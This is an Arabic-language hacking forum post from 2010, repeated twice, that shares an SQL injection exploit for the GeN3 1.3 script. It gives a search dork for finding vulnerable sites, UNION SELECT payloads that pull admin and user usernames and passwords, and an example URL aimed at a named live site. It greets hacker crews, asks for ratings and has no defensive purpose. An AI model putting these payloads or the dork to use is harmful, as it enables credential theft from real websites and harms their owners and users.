kad2006
03-10-2010, 06:49 AM
السلام عليكم
تفضلو الثغره
************************************************** *************************/
[ Software Information ]
[+] Vendor : http://www.ptcpay.com
[+] script : GeN3 Version 1.3
[+] Download : http://www.ptcpay.com/shop/browse_products.php
[+] Version() : 1.3
[+] Vulnerability : SQL injection
[+] Dork :inurl:"main_forum.php?cat="
************************************************** ************************/
[ Vulnerable File ]
http://server/path/main_forum.php?cat=[N.A.S.T ]
[ Exploit ]
http://server/forum/main_forum.php?cat=-1+Union+ALL+Select+1,group_concat(aId,0x3a,aUserna me,0x3a,apassword),3,4,5,6,7+FROM+admins--
http://server/forum/main_forum.php?cat=-1+Union+ALL+Select+1,group_concat(userid,0x3a,User name,0x3a,password),3,4,5,6,7+FROM+users--
[ GReet ]
[+] :Cr3W-DZ , xcv-dz , CLAW , kader11000 , exploit-db.com , ALL HACKERS MUSLIMS
شرح لثغره
الدورك
Dork :inurl:"main_forum.php?cat="
الاستغلال
+Union+ALL+Select+1,group_concat(aId,0x3a,aUsernam e,0x3a,apassword),3,4,5,6,7+FROM+admins--
مثال
http://www.gagabux.com/forum/main_forum.php?cat=-6+Union+ALL+Select+1,group_concat(aId,0x3a,aUserna me,0x3a,apassword),3,4,5,6,7+FROM+admins--
ولا تنسو ردود + تقيم
اهداء الى جميع اعضاء جيوش الهكر
تفضلو الثغره
************************************************** *************************/
[ Software Information ]
[+] Vendor : http://www.ptcpay.com
[+] script : GeN3 Version 1.3
[+] Download : http://www.ptcpay.com/shop/browse_products.php
[+] Version() : 1.3
[+] Vulnerability : SQL injection
[+] Dork :inurl:"main_forum.php?cat="
************************************************** ************************/
[ Vulnerable File ]
http://server/path/main_forum.php?cat=[N.A.S.T ]
[ Exploit ]
http://server/forum/main_forum.php?cat=-1+Union+ALL+Select+1,group_concat(aId,0x3a,aUserna me,0x3a,apassword),3,4,5,6,7+FROM+admins--
http://server/forum/main_forum.php?cat=-1+Union+ALL+Select+1,group_concat(userid,0x3a,User name,0x3a,password),3,4,5,6,7+FROM+users--
[ GReet ]
[+] :Cr3W-DZ , xcv-dz , CLAW , kader11000 , exploit-db.com , ALL HACKERS MUSLIMS
شرح لثغره
الدورك
Dork :inurl:"main_forum.php?cat="
الاستغلال
+Union+ALL+Select+1,group_concat(aId,0x3a,aUsernam e,0x3a,apassword),3,4,5,6,7+FROM+admins--
مثال
http://www.gagabux.com/forum/main_forum.php?cat=-6+Union+ALL+Select+1,group_concat(aId,0x3a,aUserna me,0x3a,apassword),3,4,5,6,7+FROM+admins--
ولا تنسو ردود + تقيم
اهداء الى جميع اعضاء جيوش الهكر